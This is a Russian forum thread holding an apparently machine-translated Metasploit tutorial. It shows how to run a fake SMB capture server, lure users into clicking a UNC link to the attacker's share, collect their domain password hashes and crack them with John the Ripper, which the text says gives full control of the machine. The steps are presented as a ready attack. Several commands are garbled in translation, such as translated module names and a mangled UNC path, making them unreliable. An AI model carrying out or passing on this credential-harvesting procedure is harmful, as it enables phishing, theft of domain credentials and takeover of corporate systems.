Основы Metasploit, часть 20: Создание поддельного SMB-сервера для сбора учётных данных

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
В предыдущих уроках серии «Основы Metasploit» мы узнали, как использовать hashdump для извлечения хешей паролей из локальной системы. В разделе «Взлом паролей с помощью Hashcat» вы узнали, как взламывать эти хеши с помощью Hashcat.

6a4a49_6cbdeff5901b4f90ae8bc0dee794121c~mv2.gif


В каждом из этих случаев хэши паролей представляли собой пароли пользователей локальной системы, а не домена. Если система входит в домен (что характерно для большинства корпораций и крупных организаций), пароли, скорее всего, хранятся на контроллере домена (DC). Как получить пароли домена, не атакуя защищённый контроллер домена?

Одна из наиболее мощных функций Metasploit — это возможность создания поддельного SMB-сервера . Это означает, что при попытке доступа к SMB-серверу система должна будет предоставить учётные данные в виде хеша пароля домена. В крупных сетях часто используется система, которая систематически подключается к каждой машине, чтобы проверить наличие обновлений и безопасность. При этом она должна предоставить свои учётные данные каждой системе, и обычно это будет пароль администратора. Если проявить терпение, это может оказаться оптимальной стратегией.

Кроме того, настроив этот поддельный SMB-сервер, мы сможем перехватывать учётные данные домена при попытке пользователей пройти аутентификацию. Мы могли бы отправить целевой странице встроенный UNC-путь, и когда пользователь нажмёт на него, мы могли бы перехватить учётные данные домена.

В отличие от некоторых других наших атак Metasploit, эта не является ни эксплойтом, ни полезной нагрузкой. Это вспомогательный модуль, способный захватить хеш в формате, который можно взломать с помощью Cain and Abel, очень мощного, но медленного взломщика паролей для Windows, или John the Ripper, вероятно, старейшего взломщика паролей, всё ещё представленного на рынке.

Шаг 1: Запустите Kali и Metasploit

Давайте начнем с запуска Kali и откроем один из моих любимых хакерских инструментов, Metasploit, введя:

kali > msfconsole

6a4a49_cd3bad64a94648eabfff27b3eb65ac2b~mv2.png


Когда мы это делаем, нас встречает очень знакомый экран-заставка Meatsploit.

6a4a49_697ec25701f44a0286b77168344cd532~mv2.png


Шаг 2: Настройка SMB-сервера

Теперь, когда Metasploit открыт, давайте настроим поддельный SMB-сервер. В отличие от некоторых других наших атак Metasploit, эта не является ни эксплойтом, ни полезной нагрузкой, а скорее вспомогательным модулем. Запустить её можно, введя:

msf > использовать вспомогательный/сервер/захват/smb

6a4a49_2f4ce41b1d9445cf9f7a337a1f4be1e6~mv2.png


Теперь, когда мы загрузили этот модуль, давайте рассмотрим параметры, которые нам необходимо настроить для использования этого модуля.

msf >показать параметры

6a4a49_d59a9bb115884d6e9e99152c06737b03~mv2.png


Как видите, этот модуль имеет множество опций, но мы можем оставить настройки по умолчанию для каждой из них, за исключением типа файла для хранения хешей для взлома.

Обратите внимание, я выделил выше параметр JOHNPWFILE. Также на самом верху есть параметр CAINPWFILE. Эти параметры позволяют определить формат файла, в котором хранятся хеши для взлома Каином и Авелем или Иоанном Потрошителем. В этом руководстве я буду использовать последний инструмент.

Для этого мне просто нужно указать этому модулю «установить» JOHNPWFILE в определенном месте, введя:

msf > set JOHNPWFILE /root/domainhashes

Теперь осталось только «эксплуатировать».

msf > эксплуатировать

6a4a49_bd1427ce323f413d9fbc97ff04b89752~mv2.png


Когда мы набираем «exploit», этот модуль запускает поддельный SMB-сервер, который будет сохранять предоставленные учетные данные в каталоге /root в файлах, начинающихся с «johnhashes».

Шаг 3: Поделиться

Теперь, когда наш SMB-сервер запущен, нам нужно, чтобы кто-то попытался войти в наш общий ресурс. Мы можем сделать это, отправив UNC-ссылку на наш общий ресурс, например:

net use \192.168.1.106occumptheweb

Когда они нажмут на эту ссылку, их учетные данные домена будут представлены нашему SMB-серверу и сохранены, как показано на снимке экрана ниже.

6a4a49_c81fd2d788f0499d8aa64f112f283f74~mv2.png


Шаг 4: Взломать хэш

Последний шаг — взломать хеши для получения пароля. Перейдите в каталог /root, чтобы найти сохранённые файлы хешей.

кали > cd /root

6a4a49_445143ce2e504cee9bf3de7a3caa74f6~mv2.png


Как видите, здесь хранятся два хеша. Чтобы их взломать, можно воспользоваться John the Ripper (он встроен в Kali), набрав:

kali > john johnhashes_netlmv2

6a4a49_1404626852d24fe0ad3038507873097f~mv2.jpg


Когда мы это сделаем, Джон Потрошитель загрузит хеш пароля, распознает тип хеша и начнёт его взлом. В зависимости от длины и сложности пароля, Джону потребуется от нескольких минут до нескольких дней, чтобы взломать хеш, но после этого вы получите пароль пользователя, перешедшего по вашей UNC-ссылке, и сможете полностью управлять компьютером!
 
20 часть основ таких полезных
 
Каждый день стоит узнавать что то новое
 
Назад
Сверху Снизу